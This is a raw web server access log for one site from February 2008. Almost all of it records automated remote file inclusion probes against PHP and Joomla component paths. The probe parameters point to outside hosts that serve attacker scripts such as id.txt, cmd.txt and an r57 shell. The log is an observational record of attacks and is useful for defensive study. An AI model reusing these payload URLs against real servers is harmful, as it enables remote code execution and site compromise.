210.205.6.94 - - [19/Feb/2008:08:21:00 -0800] "GET /logs//?step=1&vwar_root=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 200 35992 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [19/Feb/2008:08:21:30 -0800] "GET /logs/access_080117.log/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [19/Feb/2008:08:21:31 -0800] "GET /logs/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:21:34 -0800] "GET /logs/access_080130.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:22:07 -0800] "GET /logs/access_080121.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:22:07 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:22:07 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:22:29 -0800] "GET /logs/access_080117.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:22:39 -0800] "GET /logs/access_080120.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:22:59 -0800] "GET /logs/access_080106.log//components/com_videodb/core/videodb.class.xml.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:22:59 -0800] "GET //components/com_videodb/core/videodb.class.xml.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:23:00 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:08:23:00 -0800] "GET /logs/access_080131.log//components/com_videodb/core/videodb.class.xml.php=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.194.79.1 - - [19/Feb/2008:08:23:47 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://140.128.187.8/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.105 - - [19/Feb/2008:08:24:23 -0800] "GET /logs/access_071214.log HTTP/1.0" 200 157483 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.203 - - [19/Feb/2008:08:24:57 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:25:16 -0800] "GET /logs/access_080118.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:08:25:41 -0800] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:26:02 -0800] "GET /logs/access_080101.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:13 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:15 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:16 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:39 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:40 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:41 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:26:48 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:26:49 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:26:53 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:26:55 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [19/Feb/2008:08:27:09 -0800] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [19/Feb/2008:08:27:09 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.84.2 - - [19/Feb/2008:08:27:09 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:25 -0800] "GET /logs/access_080111.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:26 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:26 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:27 -0800] "GET /logs/access_080131.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:08:27:31 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:08:27:31 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:31 -0800] "GET /logs/access_080111.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:32 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:33 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [19/Feb/2008:08:27:33 -0800] "GET /logs/access_080131.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:08:28:04 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:08:28:04 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:08:28:04 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.90.25.195 - - [19/Feb/2008:08:28:07 -0800] "GET /logs/access_071230.log/includes/get_header.php?vwar_root=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.90.25.195 - - [19/Feb/2008:08:28:08 -0800] "GET /logs/includes/get_header.php?vwar_root=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:08:28:21 -0800] "GET /logs/access_080126.log/components/com_performs/performs.php?mosConfig_absolute_path=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:28:40 -0800] "GET /logs/access_080108.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:28:52 -0800] "GET /logs/access_080122.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:28:52 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:28:52 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:28:54 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:08:28:54 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:08:28:54 -0800] "GET /logs/access_080101.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:08:28:54 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:08:29:30 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:08:29:31 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:29:36 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:29:36 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:29:50 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:29:50 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.53.84.2 - - [19/Feb/2008:08:30:05 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://politics.wwf.gr/help/css/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [19/Feb/2008:08:30:07 -0800] "GET /logs/access_080129.log/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.223.20.29 - - [19/Feb/2008:08:30:08 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:30:11 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
81.223.20.29 - - [19/Feb/2008:08:30:13 -0800] "GET //include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.223.20.29 - - [19/Feb/2008:08:30:14 -0800] "GET /logs//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:30:15 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:30:15 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:30:19 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.13.86.10 - - [19/Feb/2008:08:30:24 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [19/Feb/2008:08:30:24 -0800] "GET //include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [19/Feb/2008:08:30:25 -0800] "GET /logs//include.php?path[docroot]=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:30:33 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:30:37 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.232.108.82 - - [19/Feb/2008:08:30:39 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.108.82 - - [19/Feb/2008:08:30:40 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:08:30:41 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:08:30:48 -0800] "GET /logs/access_071221.log//?step=1&vwar_root=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.143.84.82 - - [19/Feb/2008:08:31:09 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:08:31:47 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
195.178.114.10 - - [19/Feb/2008:08:31:47 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.lirik.biz/skins/bobbyzhuo/.debug/rox.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:32:10 -0800] "GET /logs/access_071119.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.35 - - [19/Feb/2008:08:32:14 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.35 - - [19/Feb/2008:08:32:14 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.35 - - [19/Feb/2008:08:32:14 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:08:33:29 -0800] "GET /logs/access_080201.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:08:33:30 -0800] "GET /logs/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.90.25.195 - - [19/Feb/2008:08:33:41 -0800] "GET /logs/access.log/includes/get_header.php?vwar_root=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:08:33:52 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:08:33:52 -0800] "GET //include.php?path[docroot]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:08:33:52 -0800] "GET /logs//include.php?path[docroot]=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:34:16 -0800] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:08:34:16 -0800] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
60.51.98.229 - - [19/Feb/2008:08:34:23 -0800] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.51.98.229 - - [19/Feb/2008:08:34:24 -0800] "GET /werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.51.98.229 - - [19/Feb/2008:08:34:25 -0800] "GET /logs/werbungFrame.php?do=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.70.151 - - [19/Feb/2008:08:34:54 -0800] "GET /pagina.php??path=http://www.asspaisbicesse.org//modules/Forums/admin/response?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:35:06 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:08:35:07 -0800] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:08:35:07 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:08:35:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:35:08 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:08:35:09 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.13.86.23 - - [19/Feb/2008:08:35:43 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.132.50 - - [19/Feb/2008:08:35:45 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
